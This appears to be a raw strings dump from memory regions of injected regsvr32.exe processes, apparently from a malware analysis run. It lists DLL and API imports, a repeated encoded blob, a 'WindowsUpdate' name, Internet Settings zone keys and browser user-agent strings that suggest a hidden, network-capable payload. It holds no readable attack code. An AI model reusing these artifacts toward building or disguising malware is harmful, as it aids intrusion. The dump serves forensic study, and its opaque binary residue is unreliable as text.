DeleteUrlCacheEntry
ole32.dll
wsock32.dll
winmm.dll
atl.dll
wtsapi32.dll
Wtsapi32.dll
PSAPI.DLL
shell32.dll
ShellExecuteExW
NtQueryValueKey
NtDeleteValueKey
NtSetValueKey
urlmon.dll
UrlMkSetSessionOption
4"4,414?4
2 2*393
7:8?8[8`8
8$8(8,8084888
Ri8aXf8RMS9kwfLTePGA5cuunQIGdwDTg8lIk/aZfb4sEEVIQPLYbEXRLF0omAUxRTG Q9FiJ3iyff6qj4Gkkv9KX3N4Kot06WGnxXEch6JUbLjZ45/YS2dzdkUCIxvHdarUDHHI3JMMqO7K7IBd01EpbB0PxbC61Td78MNiPzB/jZF6rqs4zDkZGanDTyBM52sPH8XYqbKPlXjlHL6Kw5EGq voGi4L8MDWckJ1VqrTHGFwQ4PBUl8l4HkJUoCFCjkoFryvMUUvx1oqSn3Q9/ON22eEEnrro3n32sIelEIWE 1vmKGuDcaLtKkLDsmzy lINg9/yvNr94D7VIUk8fqg5 Mw0GB8h33z yJ3scmf0ZRdHqXPSwkmODEwxPFFgRxKXR TvpDX4Knb7UjKOL5scgBEg1QVHi5QZ6BsE68J3A1LrJEzFMuI8wMNoHwEbvvW/FJGqkpegyHDt trwOd2IItS5EnuHI2d/uzQh5VHnBSk4JSTmE0u6xOjsFhutAT WmdoZXJYPll4Bh4H6ucjO AYjAViCZirXzcqmB l537VJM3zXLBGQfTTbOXB3PsSCYQ8W7MZSmZZkSCrm9SQmoYOG8Crds37EqviX UdKDkOXHUVvNkJfS6mUUVVvgwADFwOqPY K8 rp jg3LOIIfFjKAm6nW6xaETjRGPjPh522JndLpuBUZtjFRDsJ8lZSb5AN0MSFql oCchNTpo462Bqr84mG/jPhbz31a6OWiVs3GxLQZWUZEaqeI8FHrQMyfqBBJcHw47obOrkzdjyznzRXUSE rpEswADU9bDqGaiQwnfeazZAVGNXCSlnJqnv2QcGkhBNLPtDm1YhZJU4TzIUHmGRKdjvCKWCwCtq9d63MyCG17et0oR5g8 vFtX7jDL02EB/G9O59jFieuGpzJE3WBRHUOQqCEMEk0UCP/Lxr5RGPNrDNXHduPbrmof660edbyazSZtjjA/fbiCplKhzitPQZRzWCktoKKc7pcc2mvFcjT3tUVbSYfC75 O1G5Zg42AN9GAPyRhn5rk9rIvCjruUHEi4dY4kAtqWdOcjHL5fqpfajiyO/RXfgrC0AfhoiGemP2JnB960j9oagiSfZ3VxHhJLj37GppNYL1/89ueXoh5Vy8 lTJiEoYmGGlAl88KHUZuTXFpYT1Z4pXwrnkI1DVL0FGs5NdOGyeAKbo9Xs8aaxYTujku558nD2FwnA8IbBi/67WT7RAWsSKtkL7lwOLlXQvtYpwBTQWZGFtkrPjcl90DK3mSP7oPWaH9BX4iKhz22JFaLEdNiv Czh4Jqttes3oX5OJRCdws0qp2Use97 oZKC0dHxN c2O3ESpZEBDbH0bVRUzaGsrIxNiMCa/5tsuAQ0LNTWXOP OsgpRnhkJCRZmPVSrBRVpZcKv7kkxzJjw551n71u2Y66AqpnTGKkOLL6FaRYDOjKEFvzerH4etYGKb/jjwmddy UzY4Z7ws6AhGJNW1kcn A5ytg4s7ePRSHrJ0HK1sIw/E1cefkAxp0RryFmuzjMFBFOvc09 QIrPWZAEycm56xakGU9qcxMbjK9xH2rsR9wF6Qjv6LH6FNU4PsUPsJUE5D3GHahvJZd8MDR7I fIgJ8Y6i8R7Iw4cTZzdcp3rH/gGylGwtuYK zpQFPnJs6TxJVhgwDVeibDGT cmuqdt9nGnKay8OB1/ mDjsWs47ndexRZydsatmD05dCuRDDzbKRKYD16WR4DvdPOYNy7OXo990c1pmWCrBs/pF6fd6 KBui54jz6ufiSsN1ZbqIXzMCGlhd0PkM4FgyGrQaE6b gMMDLeoDBR4qIWoBVY/Ozl2Vzd5Zi4dZ6hjc28f8F/1KoyfS4V NtDR0uEcsuU6I2q1naokDAFPfiFV YRhBVNZiYzVCnqBV2kyWO/paeIb7H/2ZKIvSDkVTWaNvbE0089Q59Kj5R byL6Y9H1ciLdE38IKeWjQa9fPSRlJyvpQMS0AbX4RPvo2tIhk3Lm5c17JUOK3OGbShzt8YHIrt/9a4slvfxs7os3bg6jJax97rJqVRUFuWJ20ML1 K0yeV2wMayqZrFghV/2ycUtga7fgZVih20wz90ev4EMxyWnR/I zdEDL1PwKvjn2ReeUtzL OFyzn8cVqSQTjMD08oAmH0UNEFQlfwkkwM9X4YMrPqryUOc1RaYxgQ7z0YrY/kGk lic5r E1Ffkn9Ft5xT89i860r3D0M5BlnRdFcTZETH18mUVAnVoZLvbxWRTqDWgwr42Z XVj khzcfvUisqAPQfOiM77oUXcOxiRyfHcmmirIvBpL3zt LpmLZrGE81V5uTgklyT/PpQVbokkPIhThIqvbuDH1x77tz8qVgq62kuCcQQ8C9 pZfvUhaE7k5ZrK7SpO0CI8XSCcRBz3AFeFiQm1 iMbaL1nyAgL/xF76iP9FxTUJmXwYCWaauG  MrhELjoIDyUOztQ/Ws8 vXqYvX98cJyozEweWuTUNc7q5 p0 ESCmgrhIL/30f2rmzMrFDQAASJ4qk2YFkv1drFC /sAt7uxYhRW92OoqlHLFxH/sIqbzDQKHPGSMeulQKMHkPcOtgoqXWfQkrqIN2bDYhepdM2hO4ZH5Eoe/N/l8FYKN7KkWD2Tvx9d8byLNtQdA3c0oqzomgHkJA6sIJHtpi2LaBJ8HP7Un3guca1i9QMf6F4ynOMKYWyhxrm/82Hj/oiz/3liv/nqFiT P7eMhERpSgfS7uS/z3BECYrVJ3hnZDLpHLO15vz51DxfMRxpcbMAqeuOPaRZik73V6xXAzAFigj 1/ncX/9Bh9nFc9tSOx6em4K3 TxyoJrceU3l5JHTHMi6F l94mKNms876z9Dw041eivZ4AhUc6L0ViVB1ADIvxpMLy3T2/6Nb/sd1JWUUClB4ZZnt5ci4V/fk8h1pu7yJS9GsDfLUeCFv6uaPeUejmkwr2c b9IANOzgTOthCq/h2D4y5VlT8G1DpCeW0Qa33UYDCNwGlNHR/FWlX brwy3/tuc7ZfyO2PHKhRqFZeoTKkTXDuRqWsn4N8PqcD6 eNfscByikOu4z8 ey6LTQTUs0cst/gsbKTMdL6kfU5ORnXvpIYMJ/rDjEsMFZUUPa/dEZTfjccu46nMwLeFv/1Sy8tGQ0dgg0nGO/vDFgbWr7wu0seEjMN1xUFWgi7tq7CyRyLlhoLQvEq1j EMrtOI5hewB/mRZt06vQf77g9thV5EfCoWndVJAG11w0c23VSRQN2PTF5PKzLoxFxw 7sIVb viYqIRAipaM9QxtsNp9cSZ2qgPz5Xj3gRUaWXNv3tSwJDrGh5D2LBwfHK8frl7HcjmHFsfyrm0veNQFbgdw2ZIHazOO4ViboztG2jfL0tBwGppzj4sKFOBfyuz4w3RSFA3rCg4v4U3OeHcrXPxU1aYEloC2l9XAfl0lGQ0Jw8XlrNg2EWRcQd3OWWtEgrgWNo9gj8qVdIjVBEjQMvEXX8vjc/rC1gnnSExia2Y1cYA5kiQXIh8Saq2VED/JYoGSFcMr/XW1uynACuIH1Wm91idx8Ef04zh3XfdPkOcis7grQBfMImJiRH4xZ eO4ob6t530/KfIqg4SsXq 2D8ZmqGlmqqDXJt2S3BJ8aB8UEbOPglsRxPqYmjTropdtatNLos3H4KZAXXkYoxColKlcYHomawGrnYtHVOSDneHPEZtZOQoMygjQZDcoYJyGNpR2Qu8O7hpZW hGBnYksL0ufm6lWBGxrXGKPFGvhyIxOQTglytxFMZXun1HG28HLol8i jKH6F bsjbEaKA j2jSoTEm6btw0YhQHDq99miSNcI7JZggdLne4fhlI9Ctx98/pNSiTm6 CkMkCZM8lslDn3EnBO5BHyqeIi4BH3cUxTiP7 GUHPY9sk12DiAPXbxwfrA8ZgmNpt4jNa1NNtBmQXyJS0Q75tyJWLmFYKlglvUvEFuSep6bRmdDzgFFYQp7dKOtkBYlDQJkDX/enOXvw1kZRBCha6lsKWGahfwB/naILsjBPvwyYWjOhz9r7C jXuKp4a/aUKSsSR1oxQUAdFOyEev72353m3gGFEO9DCrpP2Nb4yT5rcFqu/70fFNvYrWXlaQQthYOAme  hxa0XUObi/NkSC1Q2PKMIcd4iUWqyjYI8k1VEXBaRNWfDu5zge2wGs5RpoXItVVVcc9Tdhf/kpAO/sDMCifGexXijM98l3PfCc374P8xIOJNAN2Zw4uY7CcsBhdI7Q2SoH9OeBrt/Wtz678mj0riAQcmbLWhFirT1nPAAWID6TCqc780BMIamCWei8phZsWuBeaAFe5arKa78IJX6qhOxV/I8RaE/ZQSRo72nxwXeHogMe9u49s8SUHlTDcfFqD6ZK/Bf9mrm9kqNZ6V0vwR9RTCTp3zIaOqOUWlf384AqE sgCgb9iCSJqF0z/P959UQMwzXAv359FKElIL8mboFK5LGOuOfgwzgNeuy8fLwmvYOMRSJ1rZSOd1X5EhO5JNncoGR7noLGk2wF/J28K/AHd3Pinn7QYCO9qbbjEdeQqzb9L3Wgui13frEV8iF7QuMgmPUJL8cuarMGgCjA1U6asICK3agxVTWFrPGDos1JiNGOHmvGZcJd3D/OzTAWVPOhFrNzImt NkHeYvzMW 2cZR1V9XunTIpbz/pIDhYfwF/2Yi2x6uAVkfderH0ynXLQiJ u5bV9ENvCX2VpCoZ y9dp//ejqqCqybHfmQp/6fRbSn lNab7wsZbRAJeePIkSamofgjeW8xaGbu5ZpUwd/k0 uTKRNPESqiAZYmPd2RU2YLUyqCCEMkZmJ75gBxnzFK7GKgQlZU9XxC24fnPp6P19g6qhEEt2qkX0Oe6fNCNWfMO7NJE2dfZ25/q1mJPqjXThahO5L5iEzxA8es68rYDlmwWg0M0Gk0 mv4UaTRDoodSnCcpIDoDjYFC3aV1T7aTleoulDVEEyG3GxfCJsKHLa1X9 OIWYoWj1ArTpZJBE6IM6j5mJkcKmLLOkgrOrC309HqgcgK3e 9 3QJTZU4d VUTOCwoP MXuTukSSrsPXQqjdzb53WbWvl5jyRzdvnDVS9NzLlE5Z124JPXMHexvxWSGT8AhV4vW5QgpptPa8cFeWEKgk97fZMfBw67azErFcI/MUddVNCdw0Ou0Rg8FKTr6xdFYbbcvz/vDlZiCivyMMiO8pqmUvNbhvNsvQxaoBdy JSvkZVpHdnuKynqdpk0WQVZWOe61L2gujDC7TqvQoVbkAYchdRj7kPSTJIO2VD/LFNOFqbqErHSeChexIsip3WnFOKmSU P9pAoqiJLEbeFcKVlf07Yofh7YL AVmm/98v1b80TpVa8FGWpAMNYR64q6CtJcNZtl1W3UKTg96SNgIRNWiAl0A58z6WJ/z2w6OjZ11LzW42S1CUGB9fDa5Y4GAR7h540Ar0bCcUpB5uDke4j0UM/ K EiFayNrGODZ5Fq8ELzd4ULA3dyVAIjATjlkWWeviHV1TId4HKX2m0Hp7Kt4VEi8Ho iFqXqr2k78zm0ot6cUGzgQhejjtD0T09MLSXrq2TeQES7sYuL7cCh19QYnaAAE2WKStO1GZSX0GIuR5f89Jopioia9cWra7JgaUSxMVoCVV4ZgdeD0Z8awr4eAFLXykq0ZIA74fGw23ksGG23BgHse2Je7giklzfkX4lom  75p4DSLQ4iaXoVVfJRLhFWDtEZLRjcIs6ic4vMFyWDtTLUvrRUu0drG0g7JS0Wvt4C9j64ZdNtBHBH3NBrR8BDMr/xNopTTCrgan5nUHmKfM/9 44mydjXU 5DLj6Yof1fdwCt7fJHICfmkZmDYDypf0Jx GDQWVhlmcjH7TiE65ScvxU6q cXSQSPb4 YyGImz/0QvYpQUyo1Q6H0oClSVMoFtVGvyXkSIm/zK8WLUw5Wjq1svMZP0v4I5VsrscNoNhPhu1st5p2UbPOirYjsdN6/CmZgvPL1oZz3Uc4nVHclToDm3tGULLDPyi7BhT9Z7mAyF/4rxZ5PbGJsdjCRb Sdf4iouWu1BWga14VyWaATnVM/eDni6lMNHdKx/mzjHz26YiqNQ8EMIyHm64fSN8MpEuDK9AV1I5vzt2Sr7q594DRt6LeJEczAdahziQqzXuQEJCXQiRt9ykAK0IgScih8IKR15PsyrUNN KWBpz7KNRpRUcjH84MKOo5Bc mszoLo/mcbbx00Uk4oP4WueHMR3iQOUHV01zjEAaOlwiEgbQyeW9h7pC43BHugPTwIMUpWEAxcPzdqV96nnZof2ckXniIurMEszerxKZQvhf0rjHCwsADh1/YqZOcu2Is vVsmZDqbID/LPNMHv49ePaEP1t3yd0uHdqlO3NnGFAXPpqMK7V4w1V6a PsaEchOac8I/S JLWKNn9CroMhyWiXMpK3RpnEH1F2gq3IjD5A7x/hLRzjXsnnlRx7x/3A0FpxYtaUCJabufXxuviuEf1DOtUTWc9Wr2UrNBYM7DFNSLCxHZcJia1lgd5C1edP/kieQhkc NJYm19rrk VmoDhQ5o VKFEfpfbODG m 9hiG3XGrLTFOyD2poOudhV2MXnSRut/jCc/RVxkKj8mzhTi1 IOoQHopYwbdrbMtN0aqrN1gp6HWaNm4pfWzfKrobU4qX6UQm2ceiTzaC8VNQoEX6Y4ACHu7gBvSf6/Xh cNXKIGydZ3TSUlQt1NuCd8PLe5535THWB2smI Lb nxKYgRi/tpxiNp6cvbvyQLpHqwPI6oGNFczLcWffb8gaJHRYuzx47AWT DSmy8VwHr4PZJzgdP0AKXVtsPJGyggPWLA/0wUS6WG2TmQHSXcgKlpr7Uf8CDBY0CiteleSNh3ZE0CuY wOFuQpw0hW4w34yypzZVsx9y5i0teholLN9B4KU3KtGtT21M xDvlH5oapAVgyX6v4zpzLoxpPSXZYf GQtlyokLrmhEDg0kWvwKZAPOpbl 2T8G2Ae9o3p1y/lAL/Z6LbUVCeMVJQXr5Hpqwu IrKzZRz1V/ Oer1z0HbaTZmLPi1zQaPCDVPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPAD
UhwEB
Uhû
Uh'%C
Uh,
Uh1%D
Ri8aXf8RMS9kwfLTePGA5cuunQIGdwDTg8lIk/aZfb4sEEVIQPLYbEXRLF0omAUxRTG Q9FiJ3iyff6qj4Gkkv9KX3N4Kot06WGnxXEch6JUbLjZ45/YS2dzdkUCIxvHdarUDHHI3JMMqO7K7IBd01EpbB0PxbC61Td78MNiPzB/jZF6rqs4zDkZGanDTyBM52sPH8XYqbKPlXjlHL6Kw5EGq voGi4L8MDWckJ1VqrTHGFwQ4PBUl8l4HkJUoCFCjkoFryvMUUvx1oqSn3Q9/ON22eEEnrro3n32sIelEIWE 1vmKGuDcaLtKkLDsmzy lINg9/yvNr94D7VIUk8fqg5 Mw0GB8h33z yJ3scmf0ZRdHqXPSwkmODEwxPFFgRxKXR TvpDX4Knb7UjKOL5scgBEg1QVHi5QZ6BsE68J3A1LrJEzFMuI8wMNoHwEbvvW/FJGqkpegyHDt trwOd2IItS5EnuHI2d/uzQh5VHnBSk4JSTmE0u6xOjsFhutAT WmdoZXJYPll4Bh4H6ucjO AYjAViCZirXzcqmB l537VJM3zXLBGQfTTbOXB3PsSCYQ8W7MZSmZZkSCrm9SQmoYOG8Crds37EqviX UdKDkOXHUVvNkJfS6mUUVVvgwADFwOqPY K8 rp jg3LOIIfFjKAm6nW6xaETjRGPjPh522JndLpuBUZtjFRDsJ8lZSb5AN0MSFql oCchNTpo462Bqr84mG/jPhbz31a6OWiVs3GxLQZWUZEaqeI8FHrQMyfqBBJcHw47obOrkzdjyznzRXUSE rpEswADU9bDqGaiQwnfeazZAVGNXCSlnJqnv2QcGkhBNLPtDm1YhZJU4TzIUHmGRKdjvCKWCwCtq9d63MyCG17et0oR5g8 vFtX7jDL02EB/G9O59jFieuGpzJE3WBRHUOQqCEMEk0UCP/Lxr5RGPNrDNXHduPbrmof660edbyazSZtjjA/fbiCplKhzitPQZRzWCktoKKc7pcc2mvFcjT3tUVbSYfC75 O1G5Zg42AN9GAPyRhn5rk9rIvCjruUHEi4dY4kAtqWdOcjHL5fqpfajiyO/RXfgrC0AfhoiGemP2JnB960j9oagiSfZ3VxHhJLj37GppNYL1/89ueXoh5Vy8 lTJiEoYmGGlAl88KHUZuTXFpYT1Z4pXwrnkI1DVL0FGs5NdOGyeAKbo9Xs8aaxYTujku558nD2FwnA8IbBi/67WT7RAWsSKtkL7lwOLlXQvtYpwBTQWZGFtkrPjcl90DK3mSP7oPWaH9BX4iKhz22JFaLEdNiv Czh4Jqttes3oX5OJRCdws0qp2Use97 oZKC0dHxN c2O3ESpZEBDbH0bVRUzaGsrIxNiMCa/5tsuAQ0LNTWXOP OsgpRnhkJCRZmPVSrBRVpZcKv7kkxzJjw551n71u2Y66AqpnTGKkOLL6FaRYDOjKEFvzerH4etYGKb/jjwmddy UzY4Z7ws6AhGJNW1kcn A5ytg4s7ePRSHrJ0HK1sIw/E1cefkAxp0RryFmuzjMFBFOvc09 QIrPWZAEycm56xakGU9qcxMbjK9xH2rsR9wF6Qjv6LH6FNU4PsUPsJUE5D3GHahvJZd8MDR7I fIgJ8Y6i8R7Iw4cTZzdcp3rH/gGylGwtuYK zpQFPnJs6TxJVhgwDVeibDGT cmuqdt9nGnKay8OB1/ mDjsWs47ndexRZydsatmD05dCuRDDzbKRKYD16WR4DvdPOYNy7OXo990c1pmWCrBs/pF6fd6 KBui54jz6ufiSsN1ZbqIXzMCGlhd0PkM4FgyGrQaE6b gMMDLeoDBR4qIWoBVY/Ozl2Vzd5Zi4dZ6hjc28f8F/1KoyfS4V NtDR0uEcsuU6I2q1naokDAFPfiFV YRhBVNZiYzVCnqBV2kyWO/paeIb7H/2ZKIvSDkVTWaNvbE0089Q59Kj5R byL6Y9H1ciLdE38IKeWjQa9fPSRlJyvpQMS0AbX4RPvo2tIhk3Lm5c17JUOK3OGbShzt8YHIrt/9a4slvfxs7os3bg6jJax97rJqVRUFuWJ20ML1 K0yeV2wMayqZrFghV/2ycUtga7fgZVih20wz90ev4EMxyWnR/I zdEDL1PwKvjn2ReeUtzL OFyzn8cVqSQTjMD08oAmH0UNEFQlfwkkwM9X4YMrPqryUOc1RaYxgQ7z0YrY/kGk lic5r E1Ffkn9Ft5xT89i860r3D0M5BlnRdFcTZETH18mUVAnVoZLvbxWRTqDWgwr42Z XVj khzcfvUisqAPQfOiM77oUXcOxiRyfHcmmirIvBpL3zt LpmLZrGE81V5uTgklyT/PpQVbokkPIhThIqvbuDH1x77tz8qVgq62kuCcQQ8C9 pZfvUhaE7k5ZrK7SpO0CI8XSCcRBz3AFeFiQm1 iMbaL1nyAgL/xF76iP9FxTUJmXwYCWaauG  MrhELjoIDyUOztQ/Ws8 vXqYvX98cJyozEweWuTUNc7q5 p0 ESCmgrhIL/30f2rmzMrFDQAASJ4qk2YFkv1drFC /sAt7uxYhRW92OoqlHLFxH/sIqbzDQKHPGSMeulQKMHkPcOtgoqXWfQkrqIN2bDYhepdM2hO4ZH5Eoe/N/l8FYKN7KkWD2Tvx9d8byLNtQdA3c0oqzomgHkJA6sIJHtpi2LaBJ8HP7Un3guca1i9QMf6F4ynOMKYWyhxrm/82Hj/oiz/3liv/nqFiT P7eMhERpSgfS7uS/z3BECYrVJ3hnZDLpHLO15vz51DxfMRxpcbMAqeuOPaRZik73V6xXAzAFigj 1/ncX/9Bh9nFc9tSOx6em4K3 TxyoJrceU3l5JHTHMi6F l94mKNms876z9Dw041eivZ4AhUc6L0ViVB1ADIvxpMLy3T2/6Nb/sd1JWUUClB4ZZnt5ci4V/fk8h1pu7yJS9GsDfLUeCFv6uaPeUejmkwr2c b9IANOzgTOthCq/h2D4y5VlT8G1DpCeW0Qa33UYDCNwGlNHR/FWlX brwy3/tuc7ZfyO2PHKhRqFZeoTKkTXDuRqWsn4N8PqcD6 eNfscByikOu4z8 ey6LTQTUs0cst/gsbKTMdL6kfU5ORnXvpIYMJ/rDjEsMFZUUPa/dEZTfjccu46nMwLeFv/1Sy8tGQ0dgg0nGO/vDFgbWr7wu0seEjMN1xUFWgi7tq7CyRyLlhoLQvEq1j EMrtOI5hewB/mRZt06vQf77g9thV5EfCoWndVJAG11w0c23VSRQN2PTF5PKzLoxFxw 7sIVb viYqIRAipaM9QxtsNp9cSZ2qgPz5Xj3gRUaWXNv3tSwJDrGh5D2LBwfHK8frl7HcjmHFsfyrm0veNQFbgdw2ZIHazOO4ViboztG2jfL0tBwGppzj4sKFOBfyuz4w3RSFA3rCg4v4U3OeHcrXPxU1aYEloC2l9XAfl0lGQ0Jw8XlrNg2EWRcQd3OWWtEgrgWNo9gj8qVdIjVBEjQMvEXX8vjc/rC1gnnSExia2Y1cYA5kiQXIh8Saq2VED/JYoGSFcMr/XW1uynACuIH1Wm91idx8Ef04zh3XfdPkOcis7grQBfMImJiRH4xZ eO4ob6t530/KfIqg4SsXq 2D8ZmqGlmqqDXJt2S3BJ8aB8UEbOPglsRxPqYmjTropdtatNLos3H4KZAXXkYoxColKlcYHomawGrnYtHVOSDneHPEZtZOQoMygjQZDcoYJyGNpR2Qu8O7hpZW hGBnYksL0ufm6lWBGxrXGKPFGvhyIxOQTglytxFMZXun1HG28HLol8i jKH6F bsjbEaKA j2jSoTEm6btw0YhQHDq99miSNcI7JZggdLne4fhlI9Ctx98/pNSiTm6 CkMkCZM8lslDn3EnBO5BHyqeIi4BH3cUxTiP7 GUHPY9sk12DiAPXbxwfrA8ZgmNpt4jNa1NNtBmQXyJS0Q75tyJWLmFYKlglvUvEFuSep6bRmdDzgFFYQp7dKOtkBYlDQJkDX/enOXvw1kZRBCha6lsKWGahfwB/naILsjBPvwyYWjOhz9r7C jXuKp4a/aUKSsSR1oxQUAdFOyEev72353m3gGFEO9DCrpP2Nb4yT5rcFqu/70fFNvYrWXlaQQthYOAme  hxa0XUObi/NkSC1Q2PKMIcd4iUWqyjYI8k1VEXBaRNWfDu5zge2wGs5RpoXItVVVcc9Tdhf/kpAO/sDMCifGexXijM98l3PfCc374P8xIOJNAN2Zw4uY7CcsBhdI7Q2SoH9OeBrt/Wtz678mj0riAQcmbLWhFirT1nPAAWID6TCqc780BMIamCWei8phZsWuBeaAFe5arKa78IJX6qhOxV/I8RaE/ZQSRo72nxwXeHogMe9u49s8SUHlTDcfFqD6ZK/Bf9mrm9kqNZ6V0vwR9RTCTp3zIaOqOUWlf384AqE sgCgb9iCSJqF0z/P959UQMwzXAv359FKElIL8mboFK5LGOuOfgwzgNeuy8fLwmvYOMRSJ1rZSOd1X5EhO5JNncoGR7noLGk2wF/J28K/AHd3Pinn7QYCO9qbbjEdeQqzb9L3Wgui13frEV8iF7QuMgmPUJL8cuarMGgCjA1U6asICK3agxVTWFrPGDos1JiNGOHmvGZcJd3D/OzTAWVPOhFrNzImt NkHeYvzMW 2cZR1V9XunTIpbz/pIDhYfwF/2Yi2x6uAVkfderH0ynXLQiJ u5bV9ENvCX2VpCoZ y9dp//ejqqCqybHfmQp/6fRbSn lNab7wsZbRAJeePIkSamofgjeW8xaGbu5ZpUwd/k0 uTKRNPESqiAZYmPd2RU2YLUyqCCEMkZmJ75gBxnzFK7GKgQlZU9XxC24fnPp6P19g6qhEEt2qkX0Oe6fNCNWfMO7NJE2dfZ25/q1mJPqjXThahO5L5iEzxA8es68rYDlmwWg0M0Gk0 mv4UaTRDoodSnCcpIDoDjYFC3aV1T7aTleoulDVEEyG3GxfCJsKHLa1X9 OIWYoWj1ArTpZJBE6IM6j5mJkcKmLLOkgrOrC309HqgcgK3e 9 3QJTZU4d VUTOCwoP MXuTukSSrsPXQqjdzb53WbWvl5jyRzdvnDVS9NzLlE5Z124JPXMHexvxWSGT8AhV4vW5QgpptPa8cFeWEKgk97fZMfBw67azErFcI/MUddVNCdw0Ou0Rg8FKTr6xdFYbbcvz/vDlZiCivyMMiO8pqmUvNbhvNsvQxaoBdy JSvkZVpHdnuKynqdpk0WQVZWOe61L2gujDC7TqvQoVbkAYchdRj7kPSTJIO2VD/LFNOFqbqErHSeChexIsip3WnFOKmSU P9pAoqiJLEbeFcKVlf07Yofh7YL AVmm/98v1b80TpVa8FGWpAMNYR64q6CtJcNZtl1W3UKTg96SNgIRNWiAl0A58z6WJ/z2w6OjZ11LzW42S1CUGB9fDa5Y4GAR7h540Ar0bCcUpB5uDke4j0UM/ K EiFayNrGODZ5Fq8ELzd4ULA3dyVAIjATjlkWWeviHV1TId4HKX2m0Hp7Kt4VEi8Ho iFqXqr2k78zm0ot6cUGzgQhejjtD0T09MLSXrq2TeQES7sYuL7cCh19QYnaAAE2WKStO1GZSX0GIuR5f89Jopioia9cWra7JgaUSxMVoCVV4ZgdeD0Z8awr4eAFLXykq0ZIA74fGw23ksGG23BgHse2Je7giklzfkX4lom  75p4DSLQ4iaXoVVfJRLhFWDtEZLRjcIs6ic4vMFyWDtTLUvrRUu0drG0g7JS0Wvt4C9j64ZdNtBHBH3NBrR8BDMr/xNopTTCrgan5nUHmKfM/9 44mydjXU 5DLj6Yof1fdwCt7fJHICfmkZmDYDypf0Jx GDQWVhlmcjH7TiE65ScvxU6q cXSQSPb4 YyGImz/0QvYpQUyo1Q6H0oClSVMoFtVGvyXkSIm/zK8WLUw5Wjq1svMZP0v4I5VsrscNoNhPhu1st5p2UbPOirYjsdN6/CmZgvPL1oZz3Uc4nVHclToDm3tGULLDPyi7BhT9Z7mAyF/4rxZ5PbGJsdjCRb Sdf4iouWu1BWga14VyWaATnVM/eDni6lMNHdKx/mzjHz26YiqNQ8EMIyHm64fSN8MpEuDK9AV1I5vzt2Sr7q594DRt6LeJEczAdahziQqzXuQEJCXQiRt9ykAK0IgScih8IKR15PsyrUNN KWBpz7KNRpRUcjH84MKOo5Bc mszoLo/mcbbx00Uk4oP4WueHMR3iQOUHV01zjEAaOlwiEgbQyeW9h7pC43BHugPTwIMUpWEAxcPzdqV96nnZof2ckXniIurMEszerxKZQvhf0rjHCwsADh1/YqZOcu2Is vVsmZDqbID/LPNMHv49ePaEP1t3yd0uHdqlO3NnGFAXPpqMK7V4w1V6a PsaEchOac8I/S JLWKNn9CroMhyWiXMpK3RpnEH1F2gq3IjD5A7x/hLRzjXsnnlRx7x/3A0FpxYtaUCJabufXxuviuEf1DOtUTWc9Wr2UrNBYM7DFNSLCxHZcJia1lgd5C1edP/kieQhkc NJYm19rrk VmoDhQ5o VKFEfpfbODG m 9hiG3XGrLTFOyD2poOudhV2MXnSRut/jCc/RVxkKj8mzhTi1 IOoQHopYwbdrbMtN0aqrN1gp6HWaNm4pfWzfKrobU4qX6UQm2ceiTzaC8VNQoEX6Y4ACHu7gBvSf6/Xh cNXKIGydZ3TSUlQt1NuCd8PLe5535THWB2smI Lb nxKYgRi/tpxiNp6cvbvyQLpHqwPI6oGNFczLcWffb8gaJHRYuzx47AWT DSmy8VwHr4PZJzgdP0AKXVtsPJGyggPWLA/0wUS6WG2TmQHSXcgKlpr7Uf8CDBY0CiteleSNh3ZE0CuY wOFuQpw0hW4w34yypzZVsx9y5i0teholLN9B4KU3KtGtT21M xDvlH5oapAVgyX6v4zpzLoxpPSXZYf GQtlyokLrmhEDg0kWvwKZAPOpbl 2T8G2Ae9o3p1y/lAL/Z6LbUVCeMVJQXr5Hpqwu IrKzZRz1V/ Oer1z0HbaTZmLPi1zQaPCDVPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPAD1
WindowsUpdate
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1
66006666

regsvr32.exe_436_rwx_01000000_00005000:

.text
`.data
.rsrc
msvcrt.dll
ADVAPI32.dll
KERNEL32.dll
NTDLL.DLL
USER32.dll
ole32.dll
regsvr32.pdb
_wcmdln
RegCloseKey
RegOpenKeyExW
Excessive # of DLL's on cmdline
5.1.2600.5512 (xpsp.080413-2105)
REGSVR32.EXE
Windows
Operating System
5.1.2600.5512
Usage: regsvr32 [/u] [/s] [/n] [/i[:cmdline]] dllname
Call DllInstall passing it an optional [cmdline]; when used with /u calls dll uninstall
Unrecognized flag: %1"Extra argument on command line: This command is only valid when an OLE Custom Control project is open.
LoadLibrary("%1") failed - ,%1 was loaded, but the %2 entry point was not found.
%1 does not appear to be a .DLL or .OCX file.V%1 was loaded, but the %2 entry point was not found.
OleUninitialize failed.["%1" is not an executable file and no registration

regsvr32.exe_928_rwx_00080000_000C2000:

.idata
.reloc
P.rsrc
Portions Copyright (c) 1983,99 Borland
kernel32.dll
Software\Microsoft\Windows NT\CurrentVersion
wininet.dll
user32.dll
ntdll.dll
Kernel32.dll
URLMON.DLL
Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
